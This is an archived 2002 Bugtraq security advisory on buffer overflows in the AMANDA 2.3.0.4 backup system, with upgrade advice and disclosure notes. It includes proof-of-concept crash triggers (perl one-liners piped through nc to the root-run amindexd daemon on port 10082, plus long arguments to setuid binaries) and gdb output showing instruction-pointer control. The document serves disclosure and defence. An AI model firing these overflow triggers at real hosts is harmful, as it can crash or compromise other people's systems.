8505550 2002-05-27 05:49 -0400 /184 rader/ zillion <zillion@snosoft.com> Sänt av: joel@lysator.liu.se Importerad: 2002-05-27 18:01 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern kopiemottagare: vuln-dev@securityfocus.com Extern kopiemottagare: cerebrum project <cerebrum@snosoft.com> Mottagare: Bugtraq (import) <22407> Ärende: AMANDA security issues ------------------------------------------------------------ From: zillion <zillion@snosoft.com> To: <bugtraq@securityfocus.com> Cc: <vuln-dev@securityfocus.com>, cerebrum project <cerebrum@snosoft.com> Message-ID: <20020527054741.N35850-100000@mail.snosoft.com> ================================================================== Security advisory: AMANDA ================================================================== Package: AMANDA Version: 2.3.0.4 Date: 26/05/2002 Issue: Local and remote overflows Risk: Medium since this is an old package Credits: zillion[at]safemode.org http://www.safemode.org http://www.snosoft.com The Advanced Maryland Automatic Network Disk Archiver (AMANDA) is a backup system which is available for many different Unix-based operating systems. Several setuid and setgid binaries which are installed by this package contain buffer overflow vulnerabilities that can be used to execute shellcode with elevated privileges. Additionally, the amindexd daemon contains a remote overflow bug that can lead to a remote system compromise. The affected version of AMANDA is an old package but is often used due to compatibility problems with newer versions. For example, this package was until recently shipped with the FreeBSD 4.5 ports collection. Fix information: ================================================================== Upgrade AMANDA to the latest stable version , which is available from the developers web site: http://www.amanda.org As noted earlier, this affects the FreeBSD ports collection that is shipped with 4.5 or earlier. FreeBSD was contacted and has removed the vulnerable AMANDA port. Thanks AMANDA developers and FreeBSD for the fast reaction on this issue. Technical details: ================================================================== The local overflows are all found in files that can only be executed by those that are member of the operator group. This is a big limitation to anyone that is trying to abuse amanda locally as normal users are not member of this group. The big risk here is the amindexd daemon (10082/TCP) that runs as root and contains several overflows of which two can be triggered without any knowledge of the affect systems configuration. The amindexd daemon (remote, runs as root) ------------------------------------------- Long commands send to this server will result in an immediate overflow This does not require any knowledge of the affect systems configuration. Simple replication of this overflow: perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082 perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082 The below listed file are only accessible by users that are member of the group 'operator'. This is a big limitation for anyone that will try to abuse them ;). The amcheck file (setuid root) ------------------------------------------- bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'` Segmentation fault (core dumped) (gdb) bt #0 0x2814c022 in ?? () #1 0x280f8c0a in ?? () #2 0x804d671 in ?? () #3 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb) The amgetidx file (setuid operator) ------------------------------------------- (gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x28144022 in vfprintf () from /usr/lib/libc.so.4 (gdb) bt #0 0x28144022 in vfprintf () from /usr/lib/libc.so.4 #1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4 #2 0x804c8dd in getsockname () #3 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The amtrmidx file (setuid operator) ------------------------------------------- bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x28141022 in vfprintf () from /usr/lib/libc.so.4 (gdb) bt #0 0x28141022 in vfprintf () from /usr/lib/libc.so.4 #1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4 #2 0x804b291 in free () #3 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The createindex-dump file (setuid operator) ------------------------------------------- sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump (gdb) r `perl -e 'print "A" x 4000'` a a a Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e 'print "A" x 4000'` a a a (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814398c in getenv () from /usr/lib/libc.so.4 (gdb) bt #0 0x2814398c in getenv () from /usr/lib/libc.so.4 #1 0x28142801 in isatty () from /usr/lib/libc.so.4 #2 0x2814362e in malloc () from /usr/lib/libc.so.4 #3 0x280fbec2 in popen () from /usr/lib/libc.so.4 #4 0x8048874 in atoi () #5 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The createindex-gnutar file (setuid operator) ---------------------------------------------- bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar (gdb) r `perl -e 'print "A" x 4000'` a a a Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e 'print "A" x 4000'` a a a (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814398c in getenv () from /usr/lib/libc.so.4 (gdb) bt #0 0x2814398c in getenv () from /usr/lib/libc.so.4 #1 0x28142801 in isatty () from /usr/lib/libc.so.4 #2 0x2814362e in malloc () from /usr/lib/libc.so.4 #3 0x280fbec2 in popen () from /usr/lib/libc.so.4 #4 0x8048811 in atoi () #5 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) (8505550) /zillion <zillion@snosoft.com>/-(Ombruten)